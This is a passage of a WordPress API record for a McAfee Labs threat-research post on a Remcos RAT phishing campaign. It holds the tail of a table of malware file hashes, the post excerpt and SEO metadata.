data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<\/tr>\n<tr aria-rowindex=\"5\">\n<td data-celllook=\"0\"><span data-contrast=\"auto\">32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<td data-celllook=\"0\"><span data-contrast=\"auto\">SykCrypter<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<\/tr>\n<tr aria-rowindex=\"6\">\n<td data-celllook=\"0\"><span data-contrast=\"auto\">61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<td data-celllook=\"0\"><span data-contrast=\"auto\">Remcos Payload<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><iframe id=\"__caac__clientPolicyIframeId\" style=\"display: none;\" src=\"https:\/\/mcas-proxyweb\/client-side-top-domain?top=0&amp;domain=www.mcafee.com.mcas.ms&amp;version=3\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored by Preksha Saxena McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email&#8230;.<\/p>\n","protected":false},"author":695,"featured_media":173702,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[180],"coauthors":[4136],"class_list":["post-173306","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs","tag-malware"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Peeling Back the Layers of RemcosRat Malware | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Preksha Saxena McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Peeling Back the Layers of RemcosRat Malware | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Preksha Saxena McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2023-08-29T17:00:49+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-12-09T04:31:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Peeling Back the Layers of RemcosRat Malware\",\"datePublished\":\"2023-08-29T17:00:49+00:00\",\"dateModified\":\"2023-12-09T04:31:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/\"},\"wordCount\":1263,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png\",\"keywords\":[\"malware\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/\",\"name\":\"Peeling Back the Layers of RemcosRat Malware | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png\",\"datePublished\":\"2023-08-29T17:00:49+00:00\",\"dateModified\":\"2023-12-09T04:31:11+00:00\",\"description\":\"Authored by Preksha Saxena McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Peeling Back the Layers of RemcosRat Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Peeling Back the Layers of RemcosRat Malware | McAfee Blog","description":"Authored by Preksha Saxena McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Peeling Back the Layers of RemcosRat Malware | McAfee Blog","og_description":"Authored by Preksha Saxena McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2023-08-29T17:00:49+00:00","article_modified_time":"2023-12-09T04:31:11+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Peeling Back the Layers of RemcosRat Malware","datePublished":"2023-08-29T17:00:49+00:00","dateModified":"2023-12-09T04:31:11+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/"},"wordCount":1263,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png","keywords":["malware"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/","name":"Peeling Back the Layers of RemcosRat Malware | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png","datePublished":"2023-08-29T17:00:49+00:00","dateModified":"2023-12-09T04:31:11+00:00","description":"Authored by Preksha Saxena McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/300x200_Blog_RemcosRat-Malware.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Peeling Back the Layers of RemcosRat Malware"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/173306","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=173306"}],"version-history":[{"count":14,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/173306\/revisions"}],"predecessor-version":[{"id":178737,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/173306\/revisions\/178737"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/173702"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=173306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=173306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=173306"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=173306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}